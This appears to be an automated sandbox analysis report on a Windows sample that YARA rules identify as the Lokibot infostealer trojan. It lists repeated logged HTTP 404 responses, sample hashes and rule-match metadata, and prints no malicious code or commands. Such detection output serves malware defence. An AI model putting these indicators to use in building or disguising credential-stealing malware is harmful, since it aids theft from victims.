                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:21:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:22:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:22:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:22:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:22:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:22:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:22:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeString found in binary or memory: http://www.ibsensoftware.com/

                      System Summary

                      barindex
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLEMatched rule: Loki Payload Author: kevoreilly
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 00000000.00000000.1682431268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: Process Memory Space: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe PID: 7468, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeCode function: 0_2_0040549C0_2_0040549C
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeCode function: 0_2_004029D40_2_004029D4
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeCode function: String function: 0041219C appears 45 times
                      Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeCode function: String function: 00405B6F appears 41 times
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.0.1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
